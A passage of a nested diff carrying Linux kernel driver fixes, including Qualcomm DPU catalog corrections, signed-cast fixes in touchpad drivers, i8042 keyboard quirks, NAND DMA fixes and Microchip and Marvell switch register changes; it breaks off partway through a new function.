+ 	.smart_dma_rev = DPU_SSPP_SMART_DMA_V2, /* TODO: v2.5 */
+ 	.ubwc_version = DPU_HW_UBWC_VER_40,
+ 	.has_src_split = true,
+@@ -855,22 +855,22 @@ static const struct dpu_sspp_cfg sc7180_sspp[] = {
+ };
+ 
+ static const struct dpu_sspp_sub_blks sm8250_vig_sblk_0 =
+-				_VIG_SBLK("0", 5, DPU_SSPP_SCALER_QSEED3LITE);
++				_VIG_SBLK("0", 5, DPU_SSPP_SCALER_QSEED4);
+ static const struct dpu_sspp_sub_blks sm8250_vig_sblk_1 =
+-				_VIG_SBLK("1", 6, DPU_SSPP_SCALER_QSEED3LITE);
++				_VIG_SBLK("1", 6, DPU_SSPP_SCALER_QSEED4);
+ static const struct dpu_sspp_sub_blks sm8250_vig_sblk_2 =
+-				_VIG_SBLK("2", 7, DPU_SSPP_SCALER_QSEED3LITE);
++				_VIG_SBLK("2", 7, DPU_SSPP_SCALER_QSEED4);
+ static const struct dpu_sspp_sub_blks sm8250_vig_sblk_3 =
+-				_VIG_SBLK("3", 8, DPU_SSPP_SCALER_QSEED3LITE);
++				_VIG_SBLK("3", 8, DPU_SSPP_SCALER_QSEED4);
+ 
+ static const struct dpu_sspp_cfg sm8250_sspp[] = {
+-	SSPP_BLK("sspp_0", SSPP_VIG0, 0x4000, VIG_SM8250_MASK,
++	SSPP_BLK("sspp_0", SSPP_VIG0, 0x4000, VIG_SC7180_MASK,
+ 		sm8250_vig_sblk_0, 0,  SSPP_TYPE_VIG, DPU_CLK_CTRL_VIG0),
+-	SSPP_BLK("sspp_1", SSPP_VIG1, 0x6000, VIG_SM8250_MASK,
++	SSPP_BLK("sspp_1", SSPP_VIG1, 0x6000, VIG_SC7180_MASK,
+ 		sm8250_vig_sblk_1, 4,  SSPP_TYPE_VIG, DPU_CLK_CTRL_VIG1),
+-	SSPP_BLK("sspp_2", SSPP_VIG2, 0x8000, VIG_SM8250_MASK,
++	SSPP_BLK("sspp_2", SSPP_VIG2, 0x8000, VIG_SC7180_MASK,
+ 		sm8250_vig_sblk_2, 8, SSPP_TYPE_VIG, DPU_CLK_CTRL_VIG2),
+-	SSPP_BLK("sspp_3", SSPP_VIG3, 0xa000, VIG_SM8250_MASK,
++	SSPP_BLK("sspp_3", SSPP_VIG3, 0xa000, VIG_SC7180_MASK,
+ 		sm8250_vig_sblk_3, 12,  SSPP_TYPE_VIG, DPU_CLK_CTRL_VIG3),
+ 	SSPP_BLK("sspp_8", SSPP_DMA0, 0x24000,  DMA_SDM845_MASK,
+ 		sdm845_dma_sblk_0, 1, SSPP_TYPE_DMA, DPU_CLK_CTRL_DMA0),
+@@ -1180,6 +1180,13 @@ static const struct dpu_pingpong_cfg sm8150_pp[] = {
+ 			-1),
+ };
+ 
++static const struct dpu_pingpong_cfg sc7280_pp[] = {
++	PP_BLK("pingpong_0", PINGPONG_0, 0x69000, 0, sc7280_pp_sblk, -1, -1),
++	PP_BLK("pingpong_1", PINGPONG_1, 0x6a000, 0, sc7280_pp_sblk, -1, -1),
++	PP_BLK("pingpong_2", PINGPONG_2, 0x6b000, 0, sc7280_pp_sblk, -1, -1),
++	PP_BLK("pingpong_3", PINGPONG_3, 0x6c000, 0, sc7280_pp_sblk, -1, -1),
++};
++
+ static struct dpu_pingpong_cfg qcm2290_pp[] = {
+ 	PP_BLK("pingpong_0", PINGPONG_0, 0x70000, 0, sdm845_pp_sblk,
+ 		DPU_IRQ_IDX(MDP_SSPP_TOP0_INTR, 8),
+@@ -1203,13 +1210,6 @@ static const struct dpu_merge_3d_cfg sm8150_merge_3d[] = {
+ 	MERGE_3D_BLK("merge_3d_2", MERGE_3D_2, 0x83200),
+ };
+ 
+-static const struct dpu_pingpong_cfg sc7280_pp[] = {
+-	PP_BLK("pingpong_0", PINGPONG_0, 0x59000, 0, sc7280_pp_sblk, -1, -1),
+-	PP_BLK("pingpong_1", PINGPONG_1, 0x6a000, 0, sc7280_pp_sblk, -1, -1),
+-	PP_BLK("pingpong_2", PINGPONG_2, 0x6b000, 0, sc7280_pp_sblk, -1, -1),
+-	PP_BLK("pingpong_3", PINGPONG_3, 0x6c000, 0, sc7280_pp_sblk, -1, -1),
+-};
+-
+ /*************************************************************
+  * DSC sub blocks config
+  *************************************************************/
+diff --git a/drivers/idle/intel_idle.c b/drivers/idle/intel_idle.c
+index f060ac7376e69..cfeb24d40d378 100644
+--- a/drivers/idle/intel_idle.c
++++ b/drivers/idle/intel_idle.c
+@@ -168,7 +168,13 @@ static __cpuidle int intel_idle_irq(struct cpuidle_device *dev,
+ 
+ 	raw_local_irq_enable();
+ 	ret = __intel_idle(dev, drv, index);
+-	raw_local_irq_disable();
++
++	/*
++	 * The lockdep hardirqs state may be flipped to 'on' by a timer
++	 * tick interrupt followed by __do_softirq(). Use local_irq_disable()
++	 * rather than the raw variant to keep the hardirqs state correct.
++	 */
++	local_irq_disable();
+ 
+ 	return ret;
+ }
+diff --git a/drivers/input/joystick/xpad.c b/drivers/input/joystick/xpad.c
+index 2959d80f7fdb6..cd36cf7165423 100644
+--- a/drivers/input/joystick/xpad.c
++++ b/drivers/input/joystick/xpad.c
+@@ -779,9 +779,6 @@ static void xpad_process_packet(struct usb_xpad *xpad, u16 cmd, unsigned char *d
+ 	input_report_key(dev, BTN_C, data[8]);
+ 	input_report_key(dev, BTN_Z, data[9]);
+ 
+-	/* Profile button has a value of 0-3, so it is reported as an axis */
+-	if (xpad->mapping & MAP_PROFILE_BUTTON)
+-		input_report_abs(dev, ABS_PROFILE, data[34]);
+ 
+ 	input_sync(dev);
+ }
+@@ -1059,6 +1056,10 @@ static void xpadone_process_packet(struct usb_xpad *xpad, u16 cmd, unsigned char
+ 					(__u16) le16_to_cpup((__le16 *)(data + 8)));
+ 		}
+ 
++		/* Profile button has a value of 0-3, so it is reported as an axis */
++		if (xpad->mapping & MAP_PROFILE_BUTTON)
++			input_report_abs(dev, ABS_PROFILE, data[34]);
++
+ 		/* paddle handling */
+ 		/* based on SDL's SDL_hidapi_xboxone.c */
+ 		if (xpad->mapping & MAP_PADDLES) {
+diff --git a/drivers/input/mouse/alps.c b/drivers/input/mouse/alps.c
+index 4a6b33bbe7eaf..dd08ce97e7c90 100644
+--- a/drivers/input/mouse/alps.c
++++ b/drivers/input/mouse/alps.c
+@@ -852,8 +852,8 @@ static void alps_process_packet_v6(struct psmouse *psmouse)
+ 			x = y = z = 0;
+ 
+ 		/* Divide 4 since trackpoint's speed is too fast */
+-		input_report_rel(dev2, REL_X, (char)x / 4);
+-		input_report_rel(dev2, REL_Y, -((char)y / 4));
++		input_report_rel(dev2, REL_X, (s8)x / 4);
++		input_report_rel(dev2, REL_Y, -((s8)y / 4));
+ 
+ 		psmouse_report_standard_buttons(dev2, packet[3]);
+ 
+@@ -1104,8 +1104,8 @@ static void alps_process_trackstick_packet_v7(struct psmouse *psmouse)
+ 	    ((packet[3] & 0x20) << 1);
+ 	z = (packet[5] & 0x3f) | ((packet[3] & 0x80) >> 1);
+ 
+-	input_report_rel(dev2, REL_X, (char)x);
+-	input_report_rel(dev2, REL_Y, -((char)y));
++	input_report_rel(dev2, REL_X, (s8)x);
++	input_report_rel(dev2, REL_Y, -((s8)y));
+ 	input_report_abs(dev2, ABS_PRESSURE, z);
+ 
+ 	psmouse_report_standard_buttons(dev2, packet[1]);
+@@ -2294,20 +2294,20 @@ static int alps_get_v3_v7_resolution(struct psmouse *psmouse, int reg_pitch)
+ 	if (reg < 0)
+ 		return reg;
+ 
+-	x_pitch = (char)(reg << 4) >> 4; /* sign extend lower 4 bits */
++	x_pitch = (s8)(reg << 4) >> 4; /* sign extend lower 4 bits */
+ 	x_pitch = 50 + 2 * x_pitch; /* In 0.1 mm units */
+ 
+-	y_pitch = (char)reg >> 4; /* sign extend upper 4 bits */
++	y_pitch = (s8)reg >> 4; /* sign extend upper 4 bits */
+ 	y_pitch = 36 + 2 * y_pitch; /* In 0.1 mm units */
+ 
+ 	reg = alps_command_mode_read_reg(psmouse, reg_pitch + 1);
+ 	if (reg < 0)
+ 		return reg;
+ 
+-	x_electrode = (char)(reg << 4) >> 4; /* sign extend lower 4 bits */
++	x_electrode = (s8)(reg << 4) >> 4; /* sign extend lower 4 bits */
+ 	x_electrode = 17 + x_electrode;
+ 
+-	y_electrode = (char)reg >> 4; /* sign extend upper 4 bits */
++	y_electrode = (s8)reg >> 4; /* sign extend upper 4 bits */
+ 	y_electrode = 13 + y_electrode;
+ 
+ 	x_phys = x_pitch * (x_electrode - 1); /* In 0.1 mm units */
+diff --git a/drivers/input/mouse/focaltech.c b/drivers/input/mouse/focaltech.c
+index 6fd5fff0cbfff..c74b99077d16a 100644
+--- a/drivers/input/mouse/focaltech.c
++++ b/drivers/input/mouse/focaltech.c
+@@ -202,8 +202,8 @@ static void focaltech_process_rel_packet(struct psmouse *psmouse,
+ 	state->pressed = packet[0] >> 7;
+ 	finger1 = ((packet[0] >> 4) & 0x7) - 1;
+ 	if (finger1 < FOC_MAX_FINGERS) {
+-		state->fingers[finger1].x += (char)packet[1];
+-		state->fingers[finger1].y += (char)packet[2];
++		state->fingers[finger1].x += (s8)packet[1];
++		state->fingers[finger1].y += (s8)packet[2];
+ 	} else {
+ 		psmouse_err(psmouse, "First finger in rel packet invalid: %d\n",
+ 			    finger1);
+@@ -218,8 +218,8 @@ static void focaltech_process_rel_packet(struct psmouse *psmouse,
+ 	 */
+ 	finger2 = ((packet[3] >> 4) & 0x7) - 1;
+ 	if (finger2 < FOC_MAX_FINGERS) {
+-		state->fingers[finger2].x += (char)packet[4];
+-		state->fingers[finger2].y += (char)packet[5];
++		state->fingers[finger2].x += (s8)packet[4];
++		state->fingers[finger2].y += (s8)packet[5];
+ 	}
+ }
+ 
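
[Editor's illustration] The alps.c and focaltech.c hunks replace casts through plain char, whose signedness is implementation-defined (unsigned on arm64, for instance), with explicit s8. The (s8)(reg << 4) >> 4 idiom shifts a nibble to the top of the byte and arithmetic-shifts it back so the sign bit propagates; a runnable demonstration:

#include <stdio.h>
#include <stdint.h>

int main(void)
{
	uint8_t reg = 0xA9;	/* upper nibble 0xA (-6), lower 0x9 (-7) */

	/* Shift the nibble to the top of the byte, then arithmetic-shift
	 * back down so the sign bit propagates. */
	int low  = (int8_t)(reg << 4) >> 4;	/* 0x9 -> -7 */
	int high = (int8_t)reg >> 4;		/* 0xA -> -6 */

	printf("low nibble:  %d\n", low);
	printf("high nibble: %d\n", high);

	/* With plain char on a platform where char is unsigned, the same
	 * expressions would yield 9 and 10 instead. */
	return 0;
}
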
+diff --git a/drivers/input/serio/i8042-acpipnpio.h b/drivers/input/serio/i8042-acpipnpio.h
+index efc61736099b9..028e45bd050bf 100644
+--- a/drivers/input/serio/i8042-acpipnpio.h
++++ b/drivers/input/serio/i8042-acpipnpio.h
+@@ -610,6 +610,14 @@ static const struct dmi_system_id i8042_dmi_quirk_table[] __initconst = {
+ 		},
+ 		.driver_data = (void *)(SERIO_QUIRK_NOMUX)
+ 	},
++	{
++		/* Fujitsu Lifebook A574/H */
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "FUJITSU"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "FMVA0501PZ"),
++		},
++		.driver_data = (void *)(SERIO_QUIRK_NOMUX)
++	},
+ 	{
+ 		/* Gigabyte M912 */
+ 		.matches = {
+@@ -1116,6 +1124,20 @@ static const struct dmi_system_id i8042_dmi_quirk_table[] __initconst = {
+ 		.driver_data = (void *)(SERIO_QUIRK_NOMUX | SERIO_QUIRK_RESET_ALWAYS |
+ 					SERIO_QUIRK_NOLOOP | SERIO_QUIRK_NOPNP)
+ 	},
++	{
++		/*
++		 * Setting SERIO_QUIRK_NOMUX or SERIO_QUIRK_RESET_ALWAYS makes
++		 * the keyboard very laggy for ~5 seconds after boot and
++		 * sometimes also after resume.
++		 * However, both are required to keep the keyboard from
++		 * failing completely, sometimes after boot or resume.
++		 */
++		.matches = {
++			DMI_MATCH(DMI_BOARD_NAME, "N150CU"),
++		},
++		.driver_data = (void *)(SERIO_QUIRK_NOMUX | SERIO_QUIRK_RESET_ALWAYS |
++					SERIO_QUIRK_NOLOOP | SERIO_QUIRK_NOPNP)
++	},
+ 	{
+ 		.matches = {
+ 			DMI_MATCH(DMI_BOARD_NAME, "NH5xAx"),
+@@ -1123,6 +1145,20 @@ static const struct dmi_system_id i8042_dmi_quirk_table[] __initconst = {
+ 		.driver_data = (void *)(SERIO_QUIRK_NOMUX | SERIO_QUIRK_RESET_ALWAYS |
+ 					SERIO_QUIRK_NOLOOP | SERIO_QUIRK_NOPNP)
+ 	},
++	{
++		/*
++		 * Setting SERIO_QUIRK_NOMUX or SERIO_QUIRK_RESET_ALWAYS makes
++		 * the keyboard very laggy for ~5 seconds after boot and
++		 * sometimes also after resume.
++		 * However, both are required to keep the keyboard from
++		 * failing completely, sometimes after boot or resume.
++		 */
++		.matches = {
++			DMI_MATCH(DMI_BOARD_NAME, "NHxxRZQ"),
++		},
++		.driver_data = (void *)(SERIO_QUIRK_NOMUX | SERIO_QUIRK_RESET_ALWAYS |
++					SERIO_QUIRK_NOLOOP | SERIO_QUIRK_NOPNP)
++	},
+ 	{
+ 		.matches = {
+ 			DMI_MATCH(DMI_BOARD_NAME, "NL5xRU"),
+diff --git a/drivers/input/touchscreen/goodix.c b/drivers/input/touchscreen/goodix.c
+index c281e49826c23..25e575183dd18 100644
+--- a/drivers/input/touchscreen/goodix.c
++++ b/drivers/input/touchscreen/goodix.c
+@@ -124,10 +124,18 @@ static const unsigned long goodix_irq_flags[] = {
+ static const struct dmi_system_id nine_bytes_report[] = {
+ #if defined(CONFIG_DMI) && defined(CONFIG_X86)
+ 	{
+-		.ident = "Lenovo YogaBook",
+-		/* YB1-X91L/F and YB1-X90L/F */
++		/* Lenovo Yoga Book X90F / X90L */
+ 		.matches = {
+-			DMI_MATCH(DMI_PRODUCT_NAME, "Lenovo YB1-X9")
++			DMI_EXACT_MATCH(DMI_SYS_VENDOR, "Intel Corporation"),
++			DMI_EXACT_MATCH(DMI_PRODUCT_NAME, "CHERRYVIEW D1 PLATFORM"),
++			DMI_EXACT_MATCH(DMI_PRODUCT_VERSION, "YETI-11"),
++		}
++	},
++	{
++		/* Lenovo Yoga Book X91F / X91L */
++		.matches = {
++			/* Non-exact match to cover both the F and L versions */
++			DMI_MATCH(DMI_PRODUCT_NAME, "Lenovo YB1-X91"),
+ 		}
+ 	},
+ #endif
+diff --git a/drivers/iommu/intel/dmar.c b/drivers/iommu/intel/dmar.c
+index bc94059a5b870..f800989ea0462 100644
+--- a/drivers/iommu/intel/dmar.c
++++ b/drivers/iommu/intel/dmar.c
+@@ -1057,7 +1057,8 @@ static int alloc_iommu(struct dmar_drhd_unit *drhd)
+ 	}
+ 
+ 	err = -EINVAL;
+-	if (cap_sagaw(iommu->cap) == 0) {
++	if (!cap_sagaw(iommu->cap) &&
++	    (!ecap_smts(iommu->ecap) || ecap_slts(iommu->ecap))) {
+ 		pr_info("%s: No supported address widths. Not attempting DMA translation.\n",
+ 			iommu->name);
+ 		drhd->ignored = 1;
+diff --git a/drivers/md/dm.c b/drivers/md/dm.c
+index 89bf28ed874c2..38d8aa21ef7ac 100644
+--- a/drivers/md/dm.c
++++ b/drivers/md/dm.c
+@@ -1522,6 +1522,8 @@ static int __send_duplicate_bios(struct clone_info *ci, struct dm_target *ti,
+ 		ret = 1;
+ 		break;
+ 	default:
++		if (len)
++			setup_split_accounting(ci, *len);
+ 		/* dm_accept_partial_bio() is not supported with shared tio->len_ptr */
+ 		alloc_multiple_bios(&blist, ci, ti, num_bios);
+ 		while ((clone = bio_list_pop(&blist))) {
+diff --git a/drivers/md/md.c b/drivers/md/md.c
+index 0368b3c51c7f7..d5c362b1602b6 100644
+--- a/drivers/md/md.c
++++ b/drivers/md/md.c
+@@ -3152,6 +3152,9 @@ slot_store(struct md_rdev *rdev, const char *buf, size_t len)
+ 		err = kstrtouint(buf, 10, (unsigned int *)&slot);
+ 		if (err < 0)
+ 			return err;
++		if (slot < 0)
++			/* overflow */
++			return -ENOSPC;
+ 	}
+ 	if (rdev->mddev->pers && slot == -1) {
+ 		/* Setting 'slot' on an active array requires also
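
[Editor's illustration] slot_store() parses through (unsigned int *)&slot, so an input above INT_MAX parses "successfully" but lands negative in the signed int; the added check rejects that. A userspace rendering of the pitfall, substituting strtoul for the kernel-only kstrtouint():

#include <errno.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>

/* Mimic kstrtouint() storing through (unsigned int *)&slot: a value in
 * (INT_MAX, UINT_MAX] converts fine but is negative as a signed int. */
static int parse_slot(const char *buf, int *slot)
{
	unsigned long v = strtoul(buf, NULL, 10);

	if (v > UINT_MAX)
		return -ERANGE;
	*(unsigned int *)slot = (unsigned int)v;
	if (*slot < 0)		/* the overflow check the patch adds */
		return -ENOSPC;
	return 0;
}

int main(void)
{
	int slot;

	printf("4294967295 -> %d\n", parse_slot("4294967295", &slot));
	printf("7          -> %d (slot=%d)\n", parse_slot("7", &slot), slot);
	return 0;
}
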
+diff --git a/drivers/mtd/nand/ecc-mxic.c b/drivers/mtd/nand/ecc-mxic.c
+index 8afdca731b874..6b487ffe2f2dc 100644
+--- a/drivers/mtd/nand/ecc-mxic.c
++++ b/drivers/mtd/nand/ecc-mxic.c
+@@ -429,6 +429,7 @@ static int mxic_ecc_data_xfer_wait_for_completion(struct mxic_ecc_engine *mxic)
+ 		mxic_ecc_enable_int(mxic);
+ 		ret = wait_for_completion_timeout(&mxic->complete,
+ 						  msecs_to_jiffies(1000));
++		ret = ret ? 0 : -ETIMEDOUT;
+ 		mxic_ecc_disable_int(mxic);
+ 	} else {
+ 		ret = readl_poll_timeout(mxic->regs + INTRPT_STS, val,
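
[Editor's illustration] The one-line mxic fix exists because wait_for_completion_timeout() returns the remaining jiffies on success and 0 on timeout, not an errno, so its raw return value must not escape as the function's error code. A small userspace sketch of mapping that convention, with a fake wait standing in for the kernel call:

#include <errno.h>
#include <stdio.h>

/* Userspace stand-in: returns remaining "jiffies" on success, 0 on
 * timeout, matching wait_for_completion_timeout()'s convention. */
static unsigned long fake_wait(int completes, unsigned long timeout)
{
	return completes ? timeout / 2 : 0;
}

static int xfer_wait(int completes)
{
	unsigned long ret = fake_wait(completes, 1000);

	/* The fix: convert the remaining-time return into 0/-ETIMEDOUT
	 * instead of handing a jiffies count back as an error code. */
	return ret ? 0 : -ETIMEDOUT;
}

int main(void)
{
	printf("completed: %d\n", xfer_wait(1));
	printf("timed out: %d\n", xfer_wait(0));
	return 0;
}
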
+diff --git a/drivers/mtd/nand/raw/meson_nand.c b/drivers/mtd/nand/raw/meson_nand.c
+index 5ee01231ac4cd..a28574c009003 100644
+--- a/drivers/mtd/nand/raw/meson_nand.c
++++ b/drivers/mtd/nand/raw/meson_nand.c
+@@ -176,6 +176,7 @@ struct meson_nfc {
+ 
+ 	dma_addr_t daddr;
+ 	dma_addr_t iaddr;
++	u32 info_bytes;
+ 
+ 	unsigned long assigned_cs;
+ };
+@@ -503,6 +504,7 @@ static int meson_nfc_dma_buffer_setup(struct nand_chip *nand, void *databuf,
+ 					 nfc->daddr, datalen, dir);
+ 			return ret;
+ 		}
++		nfc->info_bytes = infolen;
+ 		cmd = GENCMDIADDRL(NFC_CMD_AIL, nfc->iaddr);
+ 		writel(cmd, nfc->reg_base + NFC_REG_CMD);
+ 
+@@ -520,8 +522,10 @@ static void meson_nfc_dma_buffer_release(struct nand_chip *nand,
+ 	struct meson_nfc *nfc = nand_get_controller_data(nand);
+ 
+ 	dma_unmap_single(nfc->dev, nfc->daddr, datalen, dir);
+-	if (infolen)
++	if (infolen) {
+ 		dma_unmap_single(nfc->dev, nfc->iaddr, infolen, dir);
++		nfc->info_bytes = 0;
++	}
+ }
+ 
+ static int meson_nfc_read_buf(struct nand_chip *nand, u8 *buf, int len)
+@@ -710,6 +714,8 @@ static void meson_nfc_check_ecc_pages_valid(struct meson_nfc *nfc,
+ 		usleep_range(10, 15);
+ 		/* info is updated by nfc dma engine*/
+ 		smp_rmb();
++		dma_sync_single_for_cpu(nfc->dev, nfc->iaddr, nfc->info_bytes,
++					DMA_FROM_DEVICE);
+ 		ret = *info & ECC_COMPLETE;
+ 	} while (!ret);
+ }
+@@ -991,7 +997,7 @@ static const struct mtd_ooblayout_ops meson_ooblayout_ops = {
+ 
+ static int meson_nfc_clk_init(struct meson_nfc *nfc)
+ {
+-	struct clk_parent_data nfc_divider_parent_data[1];
++	struct clk_parent_data nfc_divider_parent_data[1] = {0};
+ 	struct clk_init_data init = {0};
+ 	int ret;
+ 
+diff --git a/drivers/net/dsa/microchip/ksz8795.c b/drivers/net/dsa/microchip/ksz8795.c
+index bd3b133e7085b..22250ae222b5b 100644
+--- a/drivers/net/dsa/microchip/ksz8795.c
++++ b/drivers/net/dsa/microchip/ksz8795.c
+@@ -907,15 +907,14 @@ int ksz8_fdb_dump(struct ksz_device *dev, int port,
+ 	u16 entries = 0;
+ 	u8 timestamp = 0;
+ 	u8 fid;
+-	u8 member;
+-	struct alu_struct alu;
++	u8 src_port;
++	u8 mac[ETH_ALEN];
+ 
+ 	do {
+-		alu.is_static = false;
+-		ret = ksz8_r_dyn_mac_table(dev, i, alu.mac, &fid, &member,
++		ret = ksz8_r_dyn_mac_table(dev, i, mac, &fid, &src_port,
+ 					   &timestamp, &entries);
+-		if (!ret && (member & BIT(port))) {
+-			ret = cb(alu.mac, alu.fid, alu.is_static, data);
++		if (!ret && port == src_port) {
++			ret = cb(mac, fid, false, data);
+ 			if (ret)
+ 				break;
+ 		}
+diff --git a/drivers/net/dsa/microchip/ksz8863_smi.c b/drivers/net/dsa/microchip/ksz8863_smi.c
+index ddb40838181ef..ed77ac2228951 100644
+--- a/drivers/net/dsa/microchip/ksz8863_smi.c
++++ b/drivers/net/dsa/microchip/ksz8863_smi.c
+@@ -82,22 +82,16 @@ static const struct regmap_bus regmap_smi[] = {
+ 	{
+ 		.read = ksz8863_mdio_read,
+ 		.write = ksz8863_mdio_write,
+-		.max_raw_read = 1,
+-		.max_raw_write = 1,
+ 	},
+ 	{
+ 		.read = ksz8863_mdio_read,
+ 		.write = ksz8863_mdio_write,
+ 		.val_format_endian_default = REGMAP_ENDIAN_BIG,
+-		.max_raw_read = 2,
+-		.max_raw_write = 2,
+ 	},
+ 	{
+ 		.read = ksz8863_mdio_read,
+ 		.write = ksz8863_mdio_write,
+ 		.val_format_endian_default = REGMAP_ENDIAN_BIG,
+-		.max_raw_read = 4,
+-		.max_raw_write = 4,
+ 	}
+ };
+ 
+@@ -108,7 +102,6 @@ static const struct regmap_config ksz8863_regmap_config[] = {
+ 		.pad_bits = 24,
+ 		.val_bits = 8,
+ 		.cache_type = REGCACHE_NONE,
+-		.use_single_read = 1,
+ 		.lock = ksz_regmap_lock,
+ 		.unlock = ksz_regmap_unlock,
+ 	},
+@@ -118,7 +111,6 @@ static const struct regmap_config ksz8863_regmap_config[] = {
+ 		.pad_bits = 24,
+ 		.val_bits = 16,
+ 		.cache_type = REGCACHE_NONE,
+-		.use_single_read = 1,
+ 		.lock = ksz_regmap_lock,
+ 		.unlock = ksz_regmap_unlock,
+ 	},
+@@ -128,7 +120,6 @@ static const struct regmap_config ksz8863_regmap_config[] = {
+ 		.pad_bits = 24,
+ 		.val_bits = 32,
+ 		.cache_type = REGCACHE_NONE,
+-		.use_single_read = 1,
+ 		.lock = ksz_regmap_lock,
+ 		.unlock = ksz_regmap_unlock,
+ 	}
+diff --git a/drivers/net/dsa/microchip/ksz_common.c b/drivers/net/dsa/microchip/ksz_common.c
+index 07f6776bba12b..3d59298eaa5cf 100644
+--- a/drivers/net/dsa/microchip/ksz_common.c
++++ b/drivers/net/dsa/microchip/ksz_common.c
+@@ -357,13 +357,13 @@ static const u32 ksz8863_masks[] = {
+ 	[VLAN_TABLE_VALID]		= BIT(19),
+ 	[STATIC_MAC_TABLE_VALID]	= BIT(19),
+ 	[STATIC_MAC_TABLE_USE_FID]	= BIT(21),
+-	[STATIC_MAC_TABLE_FID]		= GENMASK(29, 26),
++	[STATIC_MAC_TABLE_FID]		= GENMASK(25, 22),
+ 	[STATIC_MAC_TABLE_OVERRIDE]	= BIT(20),
+ 	[STATIC_MAC_TABLE_FWD_PORTS]	= GENMASK(18, 16),
+-	[DYNAMIC_MAC_TABLE_ENTRIES_H]	= GENMASK(5, 0),
+-	[DYNAMIC_MAC_TABLE_MAC_EMPTY]	= BIT(7),
++	[DYNAMIC_MAC_TABLE_ENTRIES_H]	= GENMASK(1, 0),
++	[DYNAMIC_MAC_TABLE_MAC_EMPTY]	= BIT(2),
+ 	[DYNAMIC_MAC_TABLE_NOT_READY]	= BIT(7),
+-	[DYNAMIC_MAC_TABLE_ENTRIES]	= GENMASK(31, 28),
++	[DYNAMIC_MAC_TABLE_ENTRIES]	= GENMASK(31, 24),
+ 	[DYNAMIC_MAC_TABLE_FID]		= GENMASK(19, 16),
+ 	[DYNAMIC_MAC_TABLE_SRC_PORT]	= GENMASK(21, 20),
+ 	[DYNAMIC_MAC_TABLE_TIMESTAMP]	= GENMASK(23, 22),
+@@ -373,10 +373,10 @@ static u8 ksz8863_shifts[] = {
+ 	[VLAN_TABLE_MEMBERSHIP_S]	= 16,
+ 	[STATIC_MAC_FWD_PORTS]		= 16,
+ 	[STATIC_MAC_FID]		= 22,
+-	[DYNAMIC_MAC_ENTRIES_H]		= 3,
++	[DYNAMIC_MAC_ENTRIES_H]		= 8,
+ 	[DYNAMIC_MAC_ENTRIES]		= 24,
+ 	[DYNAMIC_MAC_FID]		= 16,
+-	[DYNAMIC_MAC_TIMESTAMP]		= 24,
++	[DYNAMIC_MAC_TIMESTAMP]		= 22,
+ 	[DYNAMIC_MAC_SRC_PORT]		= 20,
+ };
+ 
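
[Editor's illustration] The corrected ksz8863 masks move the dynamic-entry count to bits 31:24 of one word, with its two high bits in bits 1:0 of the other word (shift 8). A standalone decode in the GENMASK/FIELD_GET style; the kernel macros are reimplemented minimally here and the register values are invented, the real combining logic living in ksz8795.c:

#include <stdio.h>
#include <stdint.h>

/* Minimal userspace equivalents of the kernel's GENMASK()/FIELD_GET(). */
#define GENMASK(h, l)		(((~0u) << (l)) & (~0u >> (31 - (h))))
#define FIELD_GET(mask, val)	(((val) & (mask)) >> __builtin_ctz(mask))

#define DYNAMIC_MAC_TABLE_ENTRIES	GENMASK(31, 24)	/* was 31:28 */
#define DYNAMIC_MAC_TABLE_ENTRIES_H	GENMASK(1, 0)	/* was 5:0 */
#define DYNAMIC_MAC_ENTRIES_H_SHIFT	8		/* was 3 */

int main(void)
{
	uint32_t lo = 0x7B000000;	/* entries[7:0] in bits 31:24 */
	uint32_t hi = 0x00000002;	/* entries[9:8] in bits 1:0 */

	unsigned entries = FIELD_GET(DYNAMIC_MAC_TABLE_ENTRIES, lo) |
			   (FIELD_GET(DYNAMIC_MAC_TABLE_ENTRIES_H, hi)
			    << DYNAMIC_MAC_ENTRIES_H_SHIFT);

	printf("dynamic entries: %u\n", entries);	/* 0x27B = 635 */
	return 0;
}
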
+diff --git a/drivers/net/dsa/mv88e6xxx/Makefile b/drivers/net/dsa/mv88e6xxx/Makefile
+index c8eca2b6f9594..49bf358b9c4fa 100644
+--- a/drivers/net/dsa/mv88e6xxx/Makefile
++++ b/drivers/net/dsa/mv88e6xxx/Makefile
+@@ -15,3 +15,7 @@ mv88e6xxx-objs += port_hidden.o
+ mv88e6xxx-$(CONFIG_NET_DSA_MV88E6XXX_PTP) += ptp.o
+ mv88e6xxx-objs += serdes.o
+ mv88e6xxx-objs += smi.o
++mv88e6xxx-objs += trace.o
++
++# so the tracing framework can find trace.h
++CFLAGS_trace.o := -I$(src)
+diff --git a/drivers/net/dsa/mv88e6xxx/chip.c b/drivers/net/dsa/mv88e6xxx/chip.c
+index 3a6db36574ad7..8cf27e2654fcf 100644
+--- a/drivers/net/dsa/mv88e6xxx/chip.c
++++ b/drivers/net/dsa/mv88e6xxx/chip.c
+@@ -3354,9 +3354,14 @@ static int mv88e6xxx_setup_port(struct mv88e6xxx_chip *chip, int port)
+ 	 * If this is the upstream port for this switch, enable
+ 	 * forwarding of unknown unicasts and multicasts.
+ 	 */
+-	reg = MV88E6XXX_PORT_CTL0_IGMP_MLD_SNOOP |
+-		MV88E6185_PORT_CTL0_USE_TAG | MV88E6185_PORT_CTL0_USE_IP |
++	reg = MV88E6185_PORT_CTL0_USE_TAG | MV88E6185_PORT_CTL0_USE_IP |
+ 		MV88E6XXX_PORT_CTL0_STATE_FORWARDING;
++	/* Forward any IPv4 IGMP or IPv6 MLD frames received
++	 * by a USER port to the CPU port to allow snooping.
++	 */
++	if (dsa_is_user_port(ds, port))
++		reg |= MV88E6XXX_PORT_CTL0_IGMP_MLD_SNOOP;
++
+ 	err = mv88e6xxx_port_write(chip, port, MV88E6XXX_PORT_CTL0, reg);
+ 	if (err)
+ 		return err;
+diff --git a/drivers/net/dsa/mv88e6xxx/global1_atu.c b/drivers/net/dsa/mv88e6xxx/global1_atu.c
+index 40bd67a5c8e93..7c513a03789cf 100644
+--- a/drivers/net/dsa/mv88e6xxx/global1_atu.c
++++ b/drivers/net/dsa/mv88e6xxx/global1_atu.c
+@@ -12,6 +12,7 @@
+ 
+ #include "chip.h"
+ #include "global1.h"
++#include "trace.h"
+ 
+ /* Offset 0x01: ATU FID Register */
+ 
+@@ -114,6 +115,19 @@ static int mv88e6xxx_g1_atu_op_wait(struct mv88e6xxx_chip *chip)
+ 	return mv88e6xxx_g1_wait_bit(chip, MV88E6XXX_G1_ATU_OP, bit, 0);
+ }
+ 
++static int mv88e6xxx_g1_read_atu_violation(struct mv88e6xxx_chip *chip)
++{
++	int err;
++
